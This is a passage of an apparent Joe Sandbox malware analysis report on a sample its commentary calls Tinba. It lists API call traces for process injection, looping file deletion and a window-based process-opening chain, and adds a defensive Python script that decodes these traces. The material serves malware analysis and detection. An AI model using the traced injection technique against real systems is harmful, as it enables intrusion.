                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 675344582-0
                                                                                                                                                                • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                • Instruction ID: 5e20f8d1fd77fe1a3bbaf27d3d0f84e3a94bc46b39ba8ee9e7a75b819cd3b3af
                                                                                                                                                                • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                • Instruction Fuzzy Hash: 55513471500264AFDB227B608D49FAB77BCEF60705F0444AEFA45EB056DB74DA80CEA1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
Control-flow graph (rendered from an edge list in the original; summarized here): 22a09fd-22a0a0c calls 22a3677 and CreateProcessA; GetThreadContext (22a0a12-22a0a34), VirtualProtectEx (22a0a3a-22a0a5f), DuplicateHandle (22a0a65-22a0aa4), WriteProcessMemory (22a0aa6-22a0ad2) and ResumeThread (22a0ad4-22a0ae0) follow strictly in that order, every failure edge leading to the exit block 22a0b10 (which calls 22a0b17); after ResumeThread, 22a0ae5-22a0b09 calls Sleep and OpenMutexA and, through 22a0b0b-22a0b0e, either returns at 22a0b15, goes to the exit block, or loops back to the Sleep/OpenMutexA block.
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,022A09F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 022A0A04
                                                                                                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 022A0A2C
                                                                                                                                                                • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 022A0A57
                                                                                                                                                                • DuplicateHandle.KERNEL32(000000FF,000000FF,?,022A5834,00000000,00000000,00000002), ref: 022A0A9C
                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 022A0ACA
                                                                                                                                                                • ResumeThread.KERNEL32(?), ref: 022A0ADA
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 022A0AEA
                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 022A0B01
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1929524044.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_22a0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 617592159-0
                                                                                                                                                                • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction ID: 48795f94e43628ffb5d551bb58cc6523b4bd5c9d9d5eb839d6cfc1ea5a8520f5
                                                                                                                                                                • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction Fuzzy Hash: 403184316502159FEF229F50CC94FA977B8FF04748F0805D4AA49FE0E9DBB09A94CE64
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
Control-flow graph (rendered from an edge list in the original; summarized here): 1c09d9-1c09e8 calls 1c3653 and CreateProcessA; GetThreadContext (1c09ee-1c0a10), VirtualProtectEx (1c0a16-1c0a3b), DuplicateHandle (1c0a3c-1c0a80), WriteProcessMemory (1c0a82-1c0aae) and ResumeThread (1c0ab0-1c0abc) follow strictly in that order, every failure edge leading to the exit block 1c0aec (which calls 1c0af3); after ResumeThread, 1c0ac1-1c0ae5 calls Sleep and OpenMutexA and, through 1c0ae7-1c0aea, either returns at 1c0af1, goes to the exit block, or loops back to the Sleep/OpenMutexA block.
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
                                                                                                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
                                                                                                                                                                • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
                                                                                                                                                                • DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
                                                                                                                                                                • ResumeThread.KERNEL32(?), ref: 001C0AB6
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 001C0AC6
                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 617592159-0
                                                                                                                                                                • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction ID: d08d0b8b2051c34f5721e4dda066ff8a6639c36971b334a2f4be7756b07d5326
                                                                                                                                                                • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction Fuzzy Hash: F0312F31640215AFEF239F14CC85FAA77B8AF14744F080199AA49FE0E5DBB0DA90CE54
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,022A29C1), ref: 022A29D0
                                                                                                                                                                  • Part of subcall function 022A2A01: lstrcat.KERNEL32(00000000,022A29F8), ref: 022A2A07
                                                                                                                                                                  • Part of subcall function 022A2A01: lstrcat.KERNEL32(00000000,022A2A2F), ref: 022A2A3E
                                                                                                                                                                  • Part of subcall function 022A2A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 022A2AB8
                                                                                                                                                                  • Part of subcall function 022A2A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 022A2AFC
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 022A2B52
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 022A2B66
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1929524044.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_22a0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 588723932-0
                                                                                                                                                                • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                • Instruction ID: 3291caf38847fe9322c1b3f46360ee6ebac4fdef4d46ed08a74f455664abee49
                                                                                                                                                                • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                • Instruction Fuzzy Hash: B3415471414314DFDB22AFB08D58FAB73BDFF40704F404A95AE86EA459DA349684CEA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
Control-flow graph (rendered from an edge list in the original; summarized here): the entry block 1c29a6-1c2a1a builds a string with three lstrcat calls (through subcalls 1c25e8, 1c29dd, 1c2501 and 1c2a14); 1c2a20-1c2a43 (calls 1c2b4d, 1c34f7) and 1c2a48-1c2a4f form an inner loop; the outer loop body 1c2a51-1c2b48 contains three DeleteFileA calls (1c2a8a-1c2a94, 1c2ace-1c2ad8, 1c2b1e-1c2b2e), each reached only after a call to 1c2683 and a check in 1c26f9 or 1c3057 take the branch; the body ends with Sleep at 1c2b34-1c2b48, which branches back to 1c2a48.
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                  • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                  • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                  • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                  • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
Memory Dump Source
• Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
Similarity
• API ID: DeleteFilelstrcat$Sleep
• String ID:
• API String ID: 588723932-0
• Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
• Instruction ID: c636e14730fe7c8789ea0b8b2e66408bc148dc9e268f550b67392472ade30f33
• Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
• Instruction Fuzzy Hash: 9441F1715002289FDB22BB618D49FAB77BCEF60705F0444AAEA45E7055DB74DA80CEA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image omitted)
APIs
• lstrcat.KERNEL32(00000000,022A29F8), ref: 022A2A07
  • Part of subcall function 022A2A38: lstrcat.KERNEL32(00000000,022A2A2F), ref: 022A2A3E
  • Part of subcall function 022A2A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 022A2AB8
  • Part of subcall function 022A2A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 022A2AFC
  • Part of subcall function 022A2A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 022A2B52
  • Part of subcall function 022A2A38: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 022A2B66
Memory Dump Source
• Source File: 00000014.00000002.1929524044.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_22a0000_bin.jbxd
Similarity
• API ID: DeleteFile$lstrcat$Sleep
• String ID:
• API String ID: 4261675396-0
• Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
• Instruction ID: a2bd5812f36a82a48b988da4e90203f538b131e9fd35990a7a358e2349ea9ca9
• Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
• Instruction Fuzzy Hash: 0E414471411318DFDB22AFB08D58FAF77BDFF40704F4049A5AE86EA459DA349684CEA0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image omitted)
APIs
• lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
  • Part of subcall function 001C2A14: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
  • Part of subcall function 001C2A14: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
Memory Dump Source
• Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
Similarity
• API ID: DeleteFile$lstrcat$Sleep
• String ID:
• API String ID: 4261675396-0
• Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
• Instruction ID: d6b160bcfa924dc1f1ce780805323c99afb8a852cbc58ab7edcbb3794eecdb08
• Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
• Instruction Fuzzy Hash: 8D4130B15002289FDB22BB618D49FAF76BCEF60705F0444AEEA45E7041DB74DA80CEA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrcat.KERNEL32(00000000,022A2A2F), ref: 022A2A3E
  • Part of subcall function 022A2B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 022A2C68
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 022A2AB8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 022A2AFC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 022A2B52
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 022A2B66
Memory Dump Source
• Source File: 00000014.00000002.1929524044.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_22a0000_bin.jbxd
Similarity
• API ID: DeleteFile$Sleep$lstrcat
• String ID:
• API String ID: 531250245-0
• Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
• Instruction ID: d229d869cd74174b3f890d6bc478ec157ff561b824f05d0819012b64cdf8d9b4
• Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
• Instruction Fuzzy Hash: 05316571410358DFDB226FB08C58FAF76BCFF40708F4009A5AE45E6458DB349584CEA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
  • Part of subcall function 001C2B4D: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 001C2C44
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
Memory Dump Source
• Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
Similarity
• API ID: DeleteFile$Sleep$lstrcat
• String ID:
• API String ID: 531250245-0
• Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
• Instruction ID: 49968fa7a4b5d5aca4da9ad6627b8677a1410d3c3c0f57381d6fd9009df4eb89
• Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
• Instruction Fuzzy Hash: B9313EB15002699FDB227B618C48FAF76FCEF60705F0044AEEA45E7045DB34DA80CEA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrcat.KERNEL32(00000000,00000000), ref: 022A320E
• GetStartupInfoA.KERNEL32(00000000), ref: 022A324C
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,022A31D9,00000011,?,00000000,00000000), ref: 022A3279
• CloseHandle.KERNEL32(?,?,022A31D9,00000011,?,00000000,00000000,00000000,022A3092,00000004,00000000), ref: 022A3285
• CloseHandle.KERNEL32(?,?,022A31D9,00000011,?,00000000,00000000,00000000,022A3092,00000004,00000000), ref: 022A3291
Memory Dump Source
• Source File: 00000014.00000002.1929524044.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_22a0000_bin.jbxd
Similarity
• API ID: CloseHandle$CreateInfoProcessStartuplstrcat
• String ID:
• API String ID: 3387338972-0
• Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
• Instruction ID: 267344093a99424d6ce2f4ce6578cba88b96d3994db148ecfbd55175b9fbb11d
• Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
• Instruction Fuzzy Hash: A81124724106189FDF12AFA0CC58ADFB7FDEF40705F014595E985EA408DA309A90CEA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrcat.KERNEL32(00000000,00000000), ref: 001C31EA
• GetStartupInfoA.KERNEL32(00000000), ref: 001C3228
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C31B5,00000011,?,00000000,00000000), ref: 001C3255
• CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C3261
• CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C326D
Memory Dump Source
• Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
Similarity
• API ID: CloseHandle$CreateInfoProcessStartuplstrcat
• String ID:
• API String ID: 3387338972-0
• Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
• Instruction ID: 1a8fcc1b29af6dc6d508c4043910ddb7290efc2c1b1de9f1c1491fbd14d99cd8
• Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
• Instruction Fuzzy Hash: 871121B2504958AFDF12AF60CC45FAF77BCEF60305F0145A9E986EA005DB349A90CEA5
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • FindWindowA.USER32(001C0B57,0000000E), ref: 001C0B6A
                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 001C0B77
                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 001C0B84
                                                                                                                                                                • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 001C0BA6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$Window$ExitFindOpenThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 273847653-0
                                                                                                                                                                • Opcode ID: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                • Instruction ID: a9338b71442d5d3ebf48e46985c07ff31f3dafee2d3b1c7779650113a65b08a8
                                                                                                                                                                • Opcode Fuzzy Hash: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                • Instruction Fuzzy Hash: CE11EF25204301AEEF136BB08D56F663F28AF36B00F0A419DF8449E0A3DB20C9429A38
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,022A3F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 022A3F51
                                                                                                                                                                • Sleep.KERNEL32(000003E8,00000000,?,022A3F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 022A3F6F
                                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 022A3F7F
                                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 022A3F8F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1929524044.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_22a0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep$HandleModule
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3646095425-0
                                                                                                                                                                • Opcode ID: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                • Instruction ID: 8f772a089a96ac62b09fb66feef1c4023350abf41f9ac3f374c59a2d0b2ae649
                                                                                                                                                                • Opcode Fuzzy Hash: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                • Instruction Fuzzy Hash: C9F01C705783509BFB40BFF08C6D64A3AB9AF00704F0400D1AA89ED89ECF7490508E75
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%
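The two entries above show the API sequence Joe Sandbox recovered from the injected Tinba code: FindWindowA, then GetWindowThreadProcessId, then OpenProcess with dwDesiredAccess 0x1F0FFF, followed by a GetModuleHandleA routine that sleeps for 0x3E8, 0x7D0 and 0xBB8 milliseconds. The report prints these arguments as raw hex, so the following added example (not part of the Joe Sandbox report or its tooling) parses lines in the report's own `Api.MODULE(args), ref: addr` format, expands the OpenProcess access mask into named rights, and flags the window-to-process-handle chain. The sample lines are copied from the entries above; every function name, the heuristic and the `injection_capable` label are this example's own assumptions, and the window title behind the pointer 001C0B57 is not recoverable from the report, so nothing is assumed about it.

```python
"""Decode the per-function API lines from a Joe Sandbox report and flag the
FindWindow -> GetWindowThreadProcessId -> OpenProcess pattern.

Added example, not part of the report. SAMPLE_API_LINES is copied from the
report; all function names and the heuristic are this example's own."""
import re
from typing import NamedTuple, Optional

# Constructed sample: the API lines of the two entries above (0x1C0B57 / 0x22A3F27).
SAMPLE_API_LINES = """
• FindWindowA.USER32(001C0B57,0000000E), ref: 001C0B6A
• GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 001C0B77
• OpenProcess.KERNEL32(001F0FFF,00000000), ref: 001C0B84
• ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 001C0BA6
• GetModuleHandleA.KERNEL32(00000000,00000000,?,022A3F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 022A3F51
• Sleep.KERNEL32(000003E8,00000000,?,022A3F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 022A3F6F
• Sleep.KERNEL32(000007D0), ref: 022A3F7F
• Sleep.KERNEL32(00000BB8), ref: 022A3F8F
"""

LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Process access rights from winnt.h. 0x1F0FFF = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFF,
# the pre-Vista PROCESS_ALL_ACCESS value that malware commonly hard-codes.
PROCESS_RIGHTS = [
    (0x0001, "PROCESS_TERMINATE"),
    (0x0002, "PROCESS_CREATE_THREAD"),
    (0x0004, "PROCESS_SET_SESSIONID"),
    (0x0008, "PROCESS_VM_OPERATION"),
    (0x0010, "PROCESS_VM_READ"),
    (0x0020, "PROCESS_VM_WRITE"),
    (0x0040, "PROCESS_DUP_HANDLE"),
    (0x0080, "PROCESS_CREATE_PROCESS"),
    (0x0100, "PROCESS_SET_QUOTA"),
    (0x0200, "PROCESS_SET_INFORMATION"),
    (0x0400, "PROCESS_QUERY_INFORMATION"),
    (0x0800, "PROCESS_SUSPEND_RESUME"),
    (0x1000, "PROCESS_QUERY_LIMITED_INFORMATION"),
    (0x10000, "DELETE"),
    (0x20000, "READ_CONTROL"),
    (0x40000, "WRITE_DAC"),
    (0x80000, "WRITE_OWNER"),
    (0x100000, "SYNCHRONIZE"),
]
# Rights needed to write code into another process and start a thread on it.
INJECTION_RIGHTS = 0x0002 | 0x0008 | 0x0020  # CREATE_THREAD | VM_OPERATION | VM_WRITE


class ApiCall(NamedTuple):
    api: str
    module: str
    args: tuple   # hex strings as printed; '?' marks a value the sandbox could not resolve
    ref: int      # address of the call site


def parse_api_lines(text: str) -> list:
    """Parse 'Api.MODULE(args), ref: addr' lines; bullets and blank lines are ignored."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = LINE_RE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m.group("args").split(",")) if m.group("args") else ()
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def decode_process_access(mask: int) -> list:
    """Expand an OpenProcess dwDesiredAccess mask into the named rights it contains."""
    return [name for bit, name in PROCESS_RIGHTS if mask & bit]


def find_window_handle_chain(calls: list) -> Optional[dict]:
    """Flag FindWindow* -> GetWindowThreadProcessId -> OpenProcess within one function:
    the code locates a target by its window, resolves the owning PID and opens it.
    Reports the requested rights and whether they suffice for remote-thread injection."""
    stage = 0
    for c in calls:
        if stage == 0 and c.api in ("FindWindowA", "FindWindowW", "FindWindowExA", "FindWindowExW"):
            stage = 1
        elif stage == 1 and c.api == "GetWindowThreadProcessId":
            stage = 2
        elif stage == 2 and c.api == "OpenProcess":
            mask = int(c.args[0], 16)
            return {
                "open_process_ref": c.ref,
                "access_mask": mask,
                "rights": decode_process_access(mask),
                "injection_capable": mask & INJECTION_RIGHTS == INJECTION_RIGHTS,
            }
    return None


def sleep_durations_ms(calls: list) -> list:
    """Sleep() arguments in call order, converted from the report's hex to milliseconds."""
    return [int(c.args[0], 16) for c in calls if c.api == "Sleep" and c.args and c.args[0] != "?"]


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_API_LINES)
    print(find_window_handle_chain(parsed))
    waits = sleep_durations_ms(parsed)
    print("sleeps (ms):", waits, "total:", sum(waits))
```

Run stand-alone, the script reports the OpenProcess call at 001C0B84 requesting all 17 rights encoded in 0x1F0FFF (so `injection_capable` is true) and the three Sleep calls as 1000, 2000 and 3000 ms. The mask decoding and the one-second-step waits are facts of the listed arguments; whether this function is the injection path into explorer.exe named in the report's signatures is not something these lines alone establish.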

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(001C3EBD,00000006,E8FFFE1B,00000000), ref: 001C3EC8
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
